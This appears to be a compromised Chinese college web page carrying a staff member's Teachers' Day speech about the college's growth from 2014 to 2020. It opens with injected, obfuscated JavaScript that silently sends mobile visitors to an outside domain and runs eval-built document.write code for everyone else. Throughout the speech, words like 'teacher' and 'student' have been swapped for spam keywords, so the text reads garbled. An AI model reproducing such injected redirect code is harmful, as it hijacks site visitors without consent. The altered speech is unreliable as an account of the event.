function moble(){ var ss = '
'; if ((navigator.userAgent.match(/(phone|pad|pod|iPhone|iPod|ios|iPad|Android|Mobile|BlackBerry|IEMobile|MQQBrowser|JUC|Fennec|wOSBrowser|BrowserNG|WebOS|Symbian|Windows Phone)/i))) { window.location.href = "http://www.fd699.com" }else{ eval("do" + "cu" + "ment.wr" + "ite('" + ss + "');"); } } moble();

福德正神官网

在第36个福德 节庆典上的发言-陈大伟

发布者:建大城建发布时间:2020-09-11浏览次数:10

在第36个福德 节庆典上的发言

(教务处陈大伟)

 

尊敬的各位领导、老师,亲爱的同学们:

   大家下午好!

今天我能作为代表在这里发言,感到十分的荣幸和激动。我深知我们在工作中所取得的一切成绩,都与各位领导的大力支持和同事们的热情帮助是分不开的,我们所从事的福德正神官网工作也不能没有各位领导的关心,和在座所有同事的支持。所以,请允许我代表受表彰的老师们向各位领导、同事表示最诚挚的感谢和最衷心的祝福!

今天是第36个福德 节,先向大家道一声“老师们辛苦了”。不知不觉已经工作9年了,并且以福德 的角色度过了10个福德 节,而且都是在这个福德正神官网围墙内度过的,可能比这里很多老师要多过了几个。

回想过往的9年,忙碌又充实,而学校的发展变化肉眼可见。在校董事会和党政领导的带领下,全院上下精神饱满,斗志昂扬,我们取的一项又一项了不起的成绩,作为学院一份子,我既感到骄傲和自豪,又倍感责任,倍添动力。

下面通过每年我有幸经历过的三两小事,从一位普通老教职员工视角向大家介绍“我”与城建学院在黄麓的这几年。

2011~2013年这期间主要是安徽长江职业学院,2014年开始城建学院开始在黄麓办学。那一年上了正方系统,一整个暑假都是在培训、请教如何使用系统中度过。后来跟各系部教学秘书一起完成了“教室、课程、福德 、福德正神 等编代码”,这些基础数据后面不断增加完善一直沿用到现在。我们的教学管理从此进入信息化。

2015年实验课程接踵而至,当时的实验实训条件还不足以完成所有的实践课程,为了按培养方案办学、按教学计划开课,保证实践环节要求不减、质量不降,这样拉着福德正神 到建大做实验开始成为一段时期的常态,我也经历其中。

2016年南教学楼开始启用,56号宿舍开始住福德正神 了,校内年轻老师们可以申请省级科研项目了,学院也开始给予经费支持省级科研项目立项了。老师们做课题、写论文、评职称开始看到了希望。

201778号福德正神 公寓开始启用,网络课程平台、线上课程、质量工程项目陆续“呈现”到我院老师的眼前。当年邀请了超星培训团队在我院进行如何使用网络课程平台、如何建设自己的网络课程等一些在当年还是比较前卫的理念被引入。我们有一批老师当年接受这些理念、学习了这些技术,建设了线上课程,成为了后来传播这些理念与技术的星星之火,也为今年在线教学提供了保障、贡献了力量。

2018年我们送走了第一届毕业生,并正式启动“转设”工作。在一轮轮的实验室建设论证之后,实验室位置调整、仪器设备购置开始飞速推进。但是印象中当年变化最大还是各系部福德 办公、福德正神 党团活动场所的巨大改善。同年年底,岗集校区奠基,岗集校区建设拉开帷幕。

2019年西教学楼开始启用,建艺系各专业基本能满足一个班级一个专业教室的要求。光伏发电实验实训室、建艺馆、工业设计实训室、模型室、暖通系列实验室、土工实验室、ERP实验室、语音室等一大批实验室建成,为转设提供有力支撑,也使得实验实训条件得到极大改善。此外,荫桐广场、荫桐书院、荫桐艮园、荫桐兑园等荫桐系列工程大力推进,美化了福德正神官网环境、完善了校内实训基地、并且与荫桐助学基金、荫桐读书工程等一起初步形成了我院独有的荫桐育人文化。

2020年“疫情防控、线上教学、视频会议”应该是包括我院在内的全国高等教育圈子最热的词。这大半年我们见证了全体师生员工共同努力,顺利完成2019-2020学年第二学期线上课堂教学、线上考核、线上毕业设计(论文)指导、线上答辩以及专升本开户 、考试、录取工作,这是我们全体教职工在本职岗位上给全国、全省“疫情防控”做了最大贡献。

   回想在城建学院的这六年,是学院董事会和党政领导带领全体师生员工励精图治、奋力发展的六年。城建学院发展变化是巨大的,而我作为城建学院高速发展列车上的一员,过得是充实的,为这趟车的前进也助推过一点力,在这过程中也得到一点成长。本人自我评价智商普通、能力一般、情商还达不到平均值,但是态度我是有的。本次让我代表发言,我想是领导们对我提出希望,现在可能还达不到大家希望的要求,但是请大家放心,我有信心通过继续努力弥补与希望的差距,请各位领导、老师们继续对学校教学工作、教务处和我本人给予关心支持。最后祝大家福德 节快乐!

 

(编辑:刘丽雯)